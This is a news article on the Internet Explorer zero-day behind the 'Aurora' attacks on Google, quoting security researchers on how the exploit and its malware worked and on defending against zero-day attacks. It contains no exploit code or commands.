Computer security companies are scurrying to cope with the fallout from the Internet Explorer (IE) flaw that led to cyberattacks on Google and its corporate and individual customers.
The zero-day attack that exploited IE is part of a lethal cocktail of malware that is keeping researchers very busy.
“We’re discovering things on an up-to-the-minute basis, and we’ve seen about a dozen files dropped on infected PCs so far,” Dmitri Alperovitch, vice president of research at McAfee Labs, told TechNewsWorld.
The attacks on Google, which appeared to originate in China, have sparked a feud between the Internet giant and the nation’s government over censorship, and it could result in Google pulling away from its business dealings in the country.
Pointing to the Flaw
The vulnerability in IE is an invalid pointer reference, Microsoft said in security advisory 979352, which it issued on Thursday. Under certain conditions, the invalid pointer can be accessed after an object is deleted, the advisory states. In specially crafted attacks, like the ones launched against Google and its customers, IE can allow remote execution of code when the flaw is exploited.
A pointer is a programming language data type whose value points, or refers, to another value stored elsewhere in the computer’s memory. Pointers are also used to hold the addresses of entry points for called subroutines in procedural programming and for runtime linking to dynamic link libraries (DLLs). There are risks associated with using pointers because they allow both protected and unprotected access to memory addresses.
The attacks have been restricted to IE 6, Redmond’s advisory states, although they will work on IE 7 and IE 8 as well. The impact of the vulnerability is limited by IE’s Protected Mode on Windows operating systems starting with Vista. By default, IE runs in a restricted mode known as “Enhanced Security Configuration” on Windows Server 2003 and 2008. This also mitigates the threat because it sets the security level for the Internet zone to high, according to Microsoft.
This attack can only be launched if victims go to infected Web sites. “An attacker would have no way to force users to visit these Web sites,” the advisory reads. The hackers use trickery, typically by getting victims to click on a link in an e-mail or instant messaging message that takes them to the infected site.
Once a victim visits an infected Web site, the site downloads a fake JPEG image through the IE flaw. This then decodes and runs that to download other malware files, McAfee’s Alperovitch said. The creator of the link is still not known.
The Aurora Assault
The exploit can easily be tweaked to work with every version of the browser, McAfee’s Alperovitch pointed out. It consists of several files, each a different piece of malware. “The files have different capabilities, and we’re still conducting a comprehensive analysis,” Alperovitch said. “It’s possible there are other exploits that we haven’t discovered yet in this cocktail.”
Security vendors are pulling out all the stops to combat this attack. “We’ve got people working around the world 24 by seven on this thing, and have sent people out to several companies that were attacked to find out what happened,” Alperovitch said. Symantec and Juniper Networks are also investigating the attacks.
McAfee’s Security Insider Blog calls the attack “Aurora,” after the filepath on the attacker’s machine that was included in two of the malware binaries associated with the attack. That filepath is typically inserted by code compilers to indicate where debug symbols and source code are located on the developer’s PC.
Why were the attacks focused on Internet Explorer 6, which was launched back in 2001? Why is it that the more than 30 large enterprises which were apparently victims of the malware had not upgrade to later versions of the browser, when they have the sophistication and technical resources to do so? “A lot of the companies that are victims are very large multinational corporations and have a lot of people, so upgrading takes a long time,” Alperovitch explained.
In any event, it would have been impossible to stop the attack, Michael Sutton, vice president of security research at ZScaler, told TechNewsWorld. “This is a zero-day exploit, so nobody was aware of this and they couldn’t filter it out,” he explained. “A targeted attack using a zero-day vulnerability is very difficult to protect against.”
A zero-day attack is one targeted at application vulnerabilities that are not widely known to the security industry, or even to the software developer.
The Manly Art of Computer Self-Defense
Protection against the attack was made more difficult because the malware authors were apparently expert coders. “The attack was obfuscated, and, aside from a bunch of binary characters that were in JavaScript, there’s very little JavaScript code that would be seen on the network by an intrusion detection system or antivirus or antispam software,” Michael Geide, senior security researcher at Zscaler, told TechNewsWorld. Most of the JavaScript was encrypted or encoded and would be decoded by the “small snippet” of JavaScript visible on the network, he explained.
Many antimalware packages either automatically block JavaScript or require users to approve running it on their computers. Obfuscated code is code that has been made difficult to read; malware authors obfuscate their code to make it difficult to detect.
Although the attacks hit Google corporate and individual customers, the Internet giant is not to blame, Sutton said. “Gmail didn’t really play any role in letting the attack occur; this was an Internet Explorer attack that was a combination of exploiting the email and good social engineering.”
Is there any way to protect against zero-day attacks? Yes, Sutton said. Instead of just relying on antivirus or antimalware software, get defense in depth. This means using several different applications to provide layers of defense.
“With multiple layers of protection, an attack might get past one layer, but other applications can see the results, such as binaries being downloaded or callouts to suspicious hosts, and meanwhile you’re monitoring your logs for suspicious activity,” Sutton explained. “If something gets past one layer, it will be detected by another.”